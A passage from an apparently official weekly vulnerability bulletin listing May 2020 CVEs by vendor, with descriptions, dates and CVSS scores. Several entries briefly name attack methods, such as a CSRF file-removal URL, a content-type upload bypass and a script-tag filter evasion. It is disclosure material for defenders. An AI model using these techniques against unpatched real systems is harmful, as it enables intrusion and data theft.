MISC httplib2 -- httplib2
  In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0. 2020-05-20 4.3 CVE-2020-11078
MISC
CONFIRM
MLIST huawei -- e6878-370_devices
  E6878-370 with versions of 10.0.3.1(H557SP27C233), 10.0.3.1(H563SP1C00), 10.0.3.1(H563SP1C233) has a use after free vulnerability. The software references memory after it has been freed in certain scenario, the attacker does a series of crafted operations through web portal, successful exploit could cause a use after free condition which may lead to malicious code execution. 2020-05-21 5.4 CVE-2020-1799
MISC huawei -- multiple_smartphones
  Huawei smartphones Honor View 20;Honor 20;Honor 20 PRO;Honor Magic2 with Versions earlier than 10.0.0.179(C636E3R4P3),Versions earlier than 10.0.0.180(C185E3R3P3),Versions earlier than 10.0.0.180(C432E10R3P4),Versions earlier than 10.0.0.188(C00E62R2P11);Versions earlier than 10.0.0.187(C00E60R4P11);Versions earlier than 10.0.0.187(C00E60R4P11);Versions earlier than 10.0.0.176(C00E60R2P11) have an out of bound read vulnerability. The software reads data past the end of the intended buffer. The attacker tricks the user into installing a crafted application, successful exploit may cause information disclosure or service abnormal. 2020-05-15 5.8 CVE-2020-1808
MISC ibm -- infosphere_information_server
  IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 176268. 2020-05-19 4.3 CVE-2020-4286
XF
CONFIRM ibm -- security_access_manager_appliance
  IBM Security Access Manager Appliance 9.0.7.1 could allow an authenticated user to bypass security by allowing id_token claims manipulation without verification. IBM X-Force ID: 181481. 2020-05-20 4 CVE-2020-4461
XF
CONFIRM ibm -- spectrum_scale The Spectrum Scale 4.2.0.0 through 4.2.3.21 and 5.0.0.0 through 5.0.4.3 file system component is affected by a denial of service vulnerability in its kernel module that could allow an attacker to cause a denial of service condition on the affected system. To exploit this vulnerability, a local attacker could invoke a subset of ioctls on the Spectrum Scale device with non-valid arguments. This could allow the attacker to crash the kernel. IBM X-Force ID: 179986. 2020-05-19 4.9 CVE-2020-4411
XF
CONFIRM ibm -- spectrum_scale
  The Spectrum Scale 4.2.0.0 through 4.2.3.21 and 5.0.0.0 through 5.0.4.3 file system component is affected by a denial of service security vulnerability. An attacker can force the Spectrum Scale mmfsd/mmsdrserv daemons to unexpectedly exit, impacting the functionality of the Spectrum Scale cluster and the availability of file systems managed by Spectrum Scale. IBM X-Force ID: 179987. 2020-05-19 5 CVE-2020-4412
XF
CONFIRM ifax_solutions -- avantfax_and_hylafax_enterprise_web_interface sendfax.php in iFAX AvantFAX before 3.3.6 and HylaFAX Enterprise Web Interface before 0.2.5 allows authenticated Command Injection. 2020-05-19 6.5 CVE-2020-11766
CONFIRM intel -- cloud_hypervisor
  Kata Containers before 1.11.0 on Cloud Hypervisor persists guest filesystem changes to the underlying image file on the host. A malicious guest can overwrite the image file to gain control of all subsequent guest VMs. Since Kata Containers uses the same VM image file with all VMMs, this issue may also affect QEMU and Firecracker based guests. 2020-05-19 4.6 CVE-2020-2025
CONFIRM intelliants -- subrion_cms
  An XSS issue was identified on the Subrion CMS 4.2.1 /panel/configuration/general settings page. A remote attacker can inject arbitrary JavaScript code in the v[language_switch] parameter (within multipart/form-data), which is reflected back within a user's browser without proper output encoding. 2020-05-15 4.3 CVE-2019-20389
MISC intelliants -- subrion_cms
  A Cross-Site Request Forgery (CSRF) vulnerability was discovered in Subrion CMS 4.2.1 that allows a remote attacker to remove files on the server without a victim's knowledge, by enticing an authenticated user to visit an attacker's web page. The application fails to validate the CSRF token for a GET request. An attacker can craft a panel/uploads/read.json?cmd=rm URL (removing this token) and send it to the victim. 2020-05-15 5.8 CVE-2019-20390
MISC interchange -- interchange
  XSS in the admin help system admin/help.html and admin/quicklinks.html in Interchange 4.7.0 through 5.11.x allows remote attackers to steal credentials or data via browser JavaScript. 2020-05-15 4.3 CVE-2020-12685
MISC
CONFIRM internet_systems_consortium -- bind
  Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results. 2020-05-19 5 CVE-2020-8617
MLIST
CONFIRM
CONFIRM
DEBIAN internet_systems_consortium -- bind
  A malicious actor who intentionally exploits this lack of effective limitation on the number of fetches performed when processing referrals can, through the use of specially crafted referrals, cause a recursing server to issue a very large number of fetches in an attempt to process the referral. This has at least two potential effects: The performance of the recursing server can potentially be degraded by the additional work required to perform these fetches, and The attacker can exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor. 2020-05-19 5 CVE-2020-8616
MISC
MLIST
CONFIRM
CONFIRM
DEBIAN jquery -- jquery
  jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags that contain a whitespace character, i.e: "</script >", which results in the enclosed script logic to be executed. 2020-05-19 4.3 CVE-2020-7656
MISC kde -- amarok
  A remote user can create a specially crafted M3U file, media playlist file that when loaded by the target user, will trigger a memory leak, whereby Amarok 2.8.0 continue to waste resources over time, eventually allows attackers to cause a denial of service. 2020-05-20 4.3 CVE-2020-13152
MISC knot-resolver -- knot-resolver
  Knot Resolver before 5.1.1 allows traffic amplification via a crafted DNS answer from an attacker-controlled server, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records. 2020-05-19 5 CVE-2020-12667
MISC
MLIST
MISC
CONFIRM libexif -- libexif
  An issue was discovered in libexif before 0.6.22. Several buffer over-reads in EXIF MakerNote handling could lead to information disclosure and crashes. This is different from CVE-2020-0093. 2020-05-21 6.4 CVE-2020-13112
MISC libexif -- libexif
  An issue was discovered in libexif before 0.6.22. Use of uninitialized memory in EXIF Makernote handling could lead to crashes and potential use-after-free conditions. 2020-05-21 5 CVE-2020-13113
MISC libexif -- libexif
  An issue was discovered in libexif before 0.6.22. An unrestricted size in handling Canon EXIF MakerNote data could lead to consumption of large amounts of compute time for decoding EXIF data. 2020-05-21 4.3 CVE-2020-13114
MISC libreoffice -- libreoffice
  If LibreOffice has an encrypted document open and crashes, that document is auto-saved encrypted. On restart, LibreOffice offers to restore the document and prompts for the password to decrypt it. If the recovery is successful, and if the file format of the recovered document was not LibreOffice's default ODF file format, then affected versions of LibreOffice default that subsequent saves of the document are unencrypted. This may lead to a user accidentally saving a MSOffice file format document unencrypted while believing it to be encrypted. This issue affects: LibreOffice 6-3 series versions prior to 6.3.6; 6-4 series versions prior to 6.4.3. 2020-05-18 5 CVE-2020-12801
MISC linux -- linux_kernel
  gadget_dev_desc_UDC_store in drivers/usb/gadget/configfs.c in the Linux kernel through 5.6.13 relies on kstrdup without considering the possibility of an internal '\0' value, which allows attackers to trigger an out-of-bounds read, aka CID-15753588bcd4. 2020-05-18 4.3 CVE-2020-13143
MISC
MISC linux -- linux_kernel
  The VFIO PCI driver in the Linux kernel through 5.6.13 mishandles attempts to access disabled memory space. 2020-05-15 4.9 CVE-2020-12888
MLIST
FEDORA
MISC
MISC micro_focus -- service_manager
  Cross Site Scripting vulnerability in Micro Focus Service Manager product. Affecting versions 9.50, 9.51, 9.52, 9.60, 9.61, 9.62, 9.63. The vulnerability could be exploited to allow remote attackers to inject arbitrary web script or HTML. 2020-05-19 4.3 CVE-2020-11845
MISC microsoft -- multiple_sharepoint_products
  A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1100, CVE-2020-1101. 2020-05-21 4.3 CVE-2020-1106
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1184
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1189
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1144
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1190
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190. 2020-05-21 4.6 CVE-2020-1191
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 4.6 CVE-2020-1185
MISC microstar_international -- multiple_msi_gaming_laptops Weak permissions on the "%PROGRAMDATA%\MSI\Dragon Center" folder in Dragon Center before 2.6.2003.2401, shipped with Micro-Star MSI Gaming laptops, allows local authenticated users to overwrite system files and gain escalated privileges. One attack method is to change the Recommended App binary within App.json. Another attack method is to use this part of %PROGRAMDATA% for mounting an RPC Control directory. 2020-05-18 4.6 CVE-2020-13149
MISC misp_project -- misp
  app/View/Events/resolved_attributes.ctp in MISP before 2.4.126 has XSS in the resolved attributes view. 2020-05-18 4.3 CVE-2020-13153
MISC
MISC moodle -- moodle
  A flaw was found in Moodle versions 3.8 before 3.8.3, 3.7 before 3.7.6, 3.6 before 3.6.10, 3.5 before 3.5.12 and earlier unsupported versions. It was possible to create a SCORM package in such a way that when added to a course, it could be interacted with via web services in order to achieve remote code execution. 2020-05-21 6.5 CVE-2020-10738
CONFIRM
CONFIRM
CONFIRM naver -- whale_browser_installer Whale Browser Installer before 1.2.0.5 versions don't support signature verification for Flash installer. 2020-05-20 6.4 CVE-2020-9753
CONFIRM naviserver -- naviserver
  NaviServer 4.99.4 to 4.99.19 allows denial of service due to the nsd/driver.c ChunkedDecode function not properly validating the length of a chunk. A remote attacker can craft a chunked-transfer request that will result in a negative value being passed to memmove via the size parameter, causing the process to crash. 2020-05-16 5 CVE-2020-13111
MISC
MISC netgear -- multiple_products
  An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The administrative SOAP interface allows an unauthenticated remote write of arbitrary Wi-Fi configuration data such as authentication details (e.g., the Web-admin password), network settings, DNS settings, system administration interface configuration, etc. 2020-05-18 5.8 CVE-2020-11551
MISC
MISC
MISC nitro_software -- nitro_pro An exploitable code execution vulnerability exists in the way Nitro Pro 13.9.1.155 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. In order to trigger this vulnerability, victim must open a malicious file. 2020-05-18 6.8 CVE-2020-6092
MISC nitro_software -- nitro_pro
  An exploitable information disclosure vulnerability exists in the way Nitro Pro 13.9.1.155 does XML error handling. A specially crafted PDF document can cause uninitialized memory access resulting in information disclosure. In order to trigger this vulnerability, victim must open a malicious file. 2020-05-18 4.3 CVE-2020-6093
MISC nitro_software -- nitro_pro
  An exploitable code execution vulnerability exists in the PDF parser of Nitro Pro 13.9.1.155. A specially crafted PDF document can cause a use-after-free which can lead to remote code execution. An attacker can provide a malicious file to trigger this vulnerability. 2020-05-18 6.8 CVE-2020-6074
MISC nlnet_labs -- unbound
  Unbound before 1.10.1 has an infinite loop via malformed DNS answers received from upstream servers. 2020-05-19 5 CVE-2020-12663
MLIST
FEDORA
CONFIRM nlnet_labs -- unbound
  Unbound before 1.10.1 has Insufficient Control of Network Message Volume, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records. 2020-05-19 5 CVE-2020-12662
MISC
MLIST
FEDORA
CONFIRM node.js -- node.js
  The kerberos package before 1.0.0 for Node.js allows arbitrary code execution and privilege escalation via injection of malicious DLLs through use of the kerberos_sspi LoadLibrary() method, because of a DLL path search. 2020-05-16 6.9 CVE-2020-13110
MISC
MISC
MISC
MISC open_build_service -- open_build_service
  a Improper Access Control vulnerability in of Open Build Service allows remote attackers to read files of an OBS package where the sourceaccess/access is disabled This issue affects: Open Build Service versions prior to 2.10.5. 2020-05-19 4.3 CVE-2020-8021
CONFIRM paid_memberships_pro -- paid_memberships_pro SQL injection vulnerability in the Paid Memberships versions prior to 2.3.3 allows attacker with administrator rights to execute arbitrary SQL commands via unspecified vectors. 2020-05-20 6.5 CVE-2020-5579
MISC
MISC pcs -- dexicon
  PCS DEXICON 3.4.1 allows XSS via the loginName parameter in login_action.jsp. 2020-05-19 4.3 CVE-2020-6956
MISC php -- php
  In PHP versions 7.2.x below 7.2.31, 7.3.x below 7.3.18 and 7.4.x below 7.4.6, when HTTP file uploads are allowed, supplying overly long filenames or field names could lead PHP engine to try to allocate oversized memory storage, hit the memory limit and stop processing the request, without cleaning up temporary files created by upload request. This potentially could lead to accumulation of uncleaned temporary files exhausting the disk space on the target server. 2020-05-20 5 CVE-2019-11048
MISC
MISC
FEDORA
FEDORA powerdns -- recursor
  An issue has been found in PowerDNS Recursor 4.1.0 up to and including 4.3.0. It allows an attacker (with enough privileges to change the system's hostname) to cause disclosure of uninitialized memory content via a stack-based out-of-bounds read. It only occurs on systems where gethostname() does not have '\0' termination of the returned string if the hostname is larger than the supplied buffer. (Linux systems are not affected because the buffer is always large enough. OpenBSD systems are not affected because the returned hostname always has '\0' termination.) Under some conditions, this issue can lead to the writing of one '\0' byte out-of-bounds on the stack, causing a denial of service or possibly arbitrary code execution. 2020-05-19 6.5 CVE-2020-10030
SUSE
CONFIRM powerdns -- recursor
  An issue has been found in PowerDNS Recursor 4.1.0 through 4.3.0 where records in the answer section of a NXDOMAIN response lacking an SOA were not properly validated in SyncRes::processAnswer, allowing an attacker to bypass DNSSEC validation. 2020-05-19 5 CVE-2020-12244
SUSE
MLIST
CONFIRM
DEBIAN powerdns -- recursor
  PowerDNS Recursor from 4.1.0 up to and including 4.3.0 does not sufficiently defend against amplification attacks. An issue in the DNS protocol has been found that allow malicious parties to use recursive DNS services to attack third party authoritative name servers. The attack uses a crafted reply by an authoritative name server to amplify the resulting traffic between the recursive and other authoritative name servers. Both types of service can suffer degraded performance as an effect. This is triggered by random subdomains in the NSDNAME in NS records. PowerDNS Recursor 4.1.16, 4.2.2 and 4.3.1 contain a mitigation to limit the impact of this DNS protocol issue. 2020-05-19 5 CVE-2020-10995
SUSE
MISC
CONFIRM python -- python Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py. 2020-05-21 4.3 CVE-2020-13258
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to session fixation because session expiry and randomization are mishandled. The application can reuse a session via PHPSESSID. Also, an attacker can exploit this vulnerability in conjunction with CVE-2020-12256 or CVE-2020-12259. 2020-05-18 6.4 CVE-2020-12258
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to cross-site request forgery (CSRF) because it lacks implementation of CSRF protection such as a CSRF token. An attacker can leverage this vulnerability by creating a form (add a user, delete a user, or edit a user). 2020-05-18 6.8 CVE-2020-12257
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to remote code execution due to improper validation in the file upload functionality. vendor.crud.php accepts a file upload by checking content-type without considering the file extension and header. Thus, an attacker can exploit this by uploading a .php file to vendor.php that contains arbitrary PHP code and changing the content-type to image/gif. 2020-05-18 6.5 CVE-2020-12255
MISC readdle -- documents_app_for_ios
  An issue was discovered in the Readdle Documents app before 6.9.7 for iOS. The application's file-transfer web server allows for cross-origin requests from any domain, and the WebSocket server lacks authorization control. Any web site can execute JavaScript code (that accesses a user's data) via cross-origin requests. 2020-05-18 5 CVE-2019-20801
MISC
MISC readdle -- documents_app_for_ios
  An issue was discovered in the Readdle Documents app before 6.9.7 for iOS. The application's file-transfer web server improperly displays directory names, leading to Stored XSS, which may be used to steal a user's data. This requires user interaction because there is no known direct way for an attacker to create a crafted directory name on a victim's device. However, a crafted directory name can occur if a victim extracts a ZIP archive that was provided by an attacker. 2020-05-18 4.3 CVE-2019-20802
MISC
MISC red_hat -- ansible_engine_and_ansible_tower
  An incomplete fix was found for the fix of the flaw CVE-2020-1733 ansible: insecure temporary directory when running become_user from become directive. The provided fix is insufficient to prevent the race condition on systems using ACLs and FUSE filesystems. Ansible Engine 2.7.18, 2.8.12, and 2.9.9 as well as previous versions are affected and Ansible Tower 3.4.5, 3.5.6 and 3.6.4 as well as previous versions are affected. 2020-05-15 4.4 CVE-2020-10744
CONFIRM red_hat -- jboss_keycloak
  A flaw was found in Keycloak in versions before 10.0.0, where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack. 2020-05-15 4.3 CVE-2020-1758
CONFIRM
MISC red_hat -- jboss_resteasy
  A flaw was found in all resteasy 3.x.x versions prior to 3.12.0.Final and all resteasy 4.x.x versions prior to 4.6.0.Final, where an improper input validation results in returning an illegal header that integrates into the server's response. This flaw may result in an injection, which leads to unexpected behavior when the HTTP response is constructed. 2020-05-19 5 CVE-2020-1695
CONFIRM rockwell_automation -- eds_subsystem Products that use EDS Subsystem: Version 28.0.1 and prior (FactoryTalk Linx software (Previously called RSLinx Enterprise): Versions 6.00, 6.10, and 6.11, RSLinx Classic: Version 4.11.00 and prior, RSNetWorx software: Version 28.00.00 and prior, Studio 5000 Logix Designer software: Version 32 and prior) is vulnerable. A memory corruption vulnerability exists in the algorithm that matches square brackets in the EDS subsystem. This may allow an attacker to craft specialized EDS files to crash the EDSParser COM object, leading to denial-of-service conditions. 2020-05-19 4.3 CVE-2020-12038
MISC rockwell_automation -- eds_subsystem
  Products that use EDS Subsystem: Version 28.0.1 and prior (FactoryTalk Linx software (Previously called RSLinx Enterprise): Versions 6.00, 6.10, and 6.11, RSLinx Classic: Version 4.11.00 and prior, RSNetWorx software: Version 28.00.00 and prior, Studio 5000 Logix Designer software: Version 32 and prior) is vulnerable.The EDS subsystem does not provide adequate input sanitation, which may allow an attacker to craft specialized EDS files to inject SQL queries and manipulate the database storing the EDS files. This can lead to denial-of-service conditions. 2020-05-20 4.8 CVE-2020-12034
MISC signal -- private_messenger
  Signal Private Messenger Android v4.59.0 and up and iOS v3.8.1.5 and up allows a remote non-contact to ring a victim's Signal phone and disclose currently used DNS server due to ICE Candidate handling before call is answered or declined. 2020-05-20 5 CVE-2020-5753
MISC sourcefabric -- newscoop
  Because of Unrestricted Upload of a File with a Dangerous Type, Sourcefabric Newscoop 4.4.7 allows an authenticated user to execute arbitrary PHP code (and sometimes terminal commands) on a server by making an avatar update and then visiting the avatar file under the /images/ path. 2020-05-19 4.6 CVE-2020-11807
MISC
MISC submitty -- submitty Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. 2020-05-16 5.8 CVE-2020-13121
MISC tibco_software -- multiple_products
  The report generator component of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, and TIBCO JasperReports Server for ActiveMatrix BPM contains a vulnerability that theoretically allows an attacker to exploit HTML injection to gain full control of a web interface containing the output of the report generator component with the privileges of any user that views the affected report(s). The attacker can theoretically exploit this vulnerability when other users view a maliciously generated report, where those reports use Fusion Charts and a data source with contents controlled by the attacker. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Library: versions 7.1.1 and below, versions 7.2.0 and 7.2.1, version 7.3.0, version 7.5.0, TIBCO JasperReports Library for ActiveMatrix BPM: versions 7.1.1 and below, TIBCO JasperReports Server: versions 7.1.1 and below, version 7.2.0, version 7.5.0, TIBCO JasperReports Server for AWS Marketplace: versions 7.5.0 and below, and TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.1.1 and below. 2020-05-20 6.8 CVE-2020-9410
CONFIRM transmission -- transmission
  Use-after-free in libtransmission/variant.c in Transmission before 3.00 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted torrent file. 2020-05-15 6.8 CVE-2018-10756
MISC
MLIST
FEDORA
MISC unisys -- algol_compiler
  Unisys ALGOL Compiler 58.1 before 58.1a.15, 59.1 before 59.1a.9, and 60.0 before 60.0a.5 can emit invalid code sequences under rare circumstances related to syntax. The resulting code could, for example, trigger a system fault or adversely affect confidentiality, integrity, and availability. 2020-05-21 5.9 CVE-2020-12647
CONFIRM videolan -- vlc_media_player
  An off-by-one error in the DecodeBlock function in codec/sdl_image.c in VideoLAN VLC media player before 3.0.9 allows remote attackers to cause a denial of service (memory corruption) via a crafted image file. NOTE: this may be related to the SDL_Image product. 2020-05-15 6.8 CVE-2019-19721
MISC
MISC
MISC
MISC vmware -- cloud_director
  VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access. 2020-05-20 6.5 CVE-2020-3956
MISC wireshark -- wireshark
  In Wireshark 3.2.0 to 3.2.3, 3.0.0 to 3.0.10, and 2.6.0 to 2.6.16, the NFS dissector could crash. This was addressed in epan/dissectors/packet-nfs.c by preventing excessive recursion, such as for a cycle in the directory graph on a filesystem. 2020-05-19 5 CVE-2020-13164
MISC
MISC
MISC wordpress -- wordpress
  An issue was discovered in the "Ultimate Addons for Elementor" plugin before 1.24.2 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13126. Unauthenticated attackers can create users with the Subscriber role even if registration is disabled. 2020-05-17 6.4 CVE-2020-13125
MISC
MISC wordpress -- wordpress
  An issue was discovered in the Elementor Pro plugin before 2.9.4 for WordPress, as exploited in the wild in May 2020 in conjunction with CVE-2020-13125. An attacker with the Subscriber role can upload arbitrary executable files to achieve remote code execution. NOTE: the free Elementor plugin is unaffected. 2020-05-17 6.5 CVE-2020-13126
MISC
MISC wowza_media_systems -- wowza_streaming_engine A Reflected XSS was found in the server selection box inside the login page at: enginemanager/loginfailed.html in Wowza Streaming Engine <= 4.x.x. 2020-05-18 4.3 CVE-2019-19456
MISC wowza_media_systems -- wowza_streaming_engine An arbitrary file download was found in the "Download Log" functionality of Wowza Streaming Engine <= 4.x.x 2020-05-18 5 CVE-2019-19454
MISC zoho -- manageengine_service_plus
  Zoho ManageEngine Service Plus before 11.1 build 11112 allows low-privilege authenticated users to discover the File Protection password via a getFileProtectionSettings call to AjaxServlet. 2020-05-18 4 CVE-2020-13154
MISC
MISC Back to top

 

Low Vulnerabilities Primary
Vendor -- Product Description Published CVSS Score Source & Patch Info d-link -- dsp-w215_devices
  D-Link DSP-W215 1.26b03 devices allow information disclosure by intercepting messages on the local network, as demonstrated by a Squid Proxy. 2020-05-18 3.3 CVE-2020-13135
MISC dolibarr -- dolibarr Dolibarr before 11.0.4 allows XSS. 2020-05-18 3.5 CVE-2020-13094
MISC
MISC
MISC dolibarr -- dolibarr
  The DMS/ECM module in Dolibarr 11.0.4 renders user-uploaded .html files in the browser when the attachment parameter is removed from the direct download link. This causes XSS. 2020-05-20 3.5 CVE-2020-13239
MISC dpdk -- dpdk A vulnerability was found in DPDK versions 18.11 and above. The vhost-crypto library code is missing validations for user-supplied values, potentially allowing an information leak through an out-of-bounds memory read. 2020-05-19 2.1 CVE-2020-10724
SUSE
MISC
CONFIRM
UBUNTU
MISC dpdk -- dpdk
  A vulnerability was found in DPDK versions 19.11 and above. A malicious container that has direct access to the vhost-user socket can keep sending VHOST_USER_GET_INFLIGHT_FD messages, causing a resource leak (file descriptors and virtual memory), which may result in a denial of service. 2020-05-20 2.1 CVE-2020-10726
SUSE
MISC
CONFIRM
MISC edx -- open_edx_ironwood
  Studio in Open edX Ironwood 2.5 allows users to upload SVG files via the "Content>File Uploads" screen. These files can contain JavaScript code and thus lead to Stored XSS. 2020-05-18 3.5 CVE-2020-13145
MISC google -- chrome Insufficient policy enforcement in enterprise in Google Chrome prior to 83.0.4103.61 allowed a local attacker to bypass navigation restrictions via UI actions. 2020-05-21 1.9 CVE-2020-6480
MISC
MISC hpipam -- phpipam
  phpIPAM 1.4 contains a stored cross site scripting (XSS) vulnerability within the Edit User Instructions field of the User Instructions widget. 2020-05-20 3.5 CVE-2020-13225
MISC
MISC huawei -- multiple_products
  There is an information leakage vulnerability in some Huawei products. An unauthenticated, adjacent attacker could exploit this vulnerability to decrypt data. Successful exploitation may leak information randomly.Affected product versions include:Product Name version Affected Version;Anne-AL00 versions Versions earlier than 9.1.0.331(C675E9R1P3T8);Berkeley-L09 versions Versions earlier than 10.0.1.1(C675R1);CD16-10 versions Versions earlier than 10.0.2.8;CD17-10 versions Versions earlier than 10.0.2.8;CD17-16 versions Versions earlier than 10.0.2.8;CD18-10 versions Versions earlier than 10.0.2.8;CD18-16 versions Versions earlier than 10.0.2.8;Columbia-TL00B versions Versions earlier than 9.0.0.187(C01E181R1P20T8);E6878-370 versions Versions earlier than 10.0.5.1(H610SP10C00);Honor 10 Lite versions Versions earlier than 10.0.0.182(C675E17R2P2);LelandP-L22A versions Versions earlier than 9.1.0.166(C675E5R1P4T8);TC5200-16 versions 2020-05-21 3.3 CVE-2020-9069
MISC huawei -- p20_smartphones
  Huawei P20 smartphones with versions earlier than 10.0.0.156(C00E156R1P4) have an improper authentication vulnerability. The vulnerability is due to that when an user wants to do certain operation, the software insufficiently validate the user's identity. Attackers need to physically access the smartphone to exploit this vulnerability. Successful exploit could allow the attacker to bypass the limit of student mode function. 2020-05-15 2.1 CVE-2020-9073
MISC ibm -- i IBM i 7.2, 7.3, and 7.4 users running complex SQL statements under a specific set of circumstances may allow a local user to obtain sensitive information that they should not have access to. IBM X-Force ID: 178318. 2020-05-17 1.9 CVE-2020-4345
XF
CONFIRM ibm -- infosphere_information_server
  IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 176475. 2020-05-19 3.5 CVE-2020-4298
XF
CONFIRM kata -- kata_containers
  An improper link resolution vulnerability affects Kata Containers versions prior to 1.11.0. Upon container teardown, a malicious guest can trick the kata-runtime into unmounting any mount point on the host and all mount points underneath it, potentiality resulting in a host DoS. 2020-05-19 2.1 CVE-2020-2024
CONFIRM
CONFIRM micro_focus -- enterprise_server_and_enterprise_developer
  Cross Site scripting vulnerability on Micro Focus Enterprise Server and Enterprise developer, affecting all versions prior to version 5.0 Patch Update 8. The vulnerability could allow an attacker to trigger administrative actions when an administrator viewed malicious data left by the attacker (stored XSS) or followed a malicious link (reflected XSS). 2020-05-18 3.5 CVE-2020-9524
MISC microsoft -- multiple_sharepoint_products
  A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1101, CVE-2020-1106. 2020-05-21 3.5 CVE-2020-1100
MISC microsoft -- multiple_sharepoint_products
  A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1100, CVE-2020-1106. 2020-05-21 3.5 CVE-2020-1101
MISC

microsoft -- sharepoint_enterprise_server_2016_and_sharepoint_server_2019

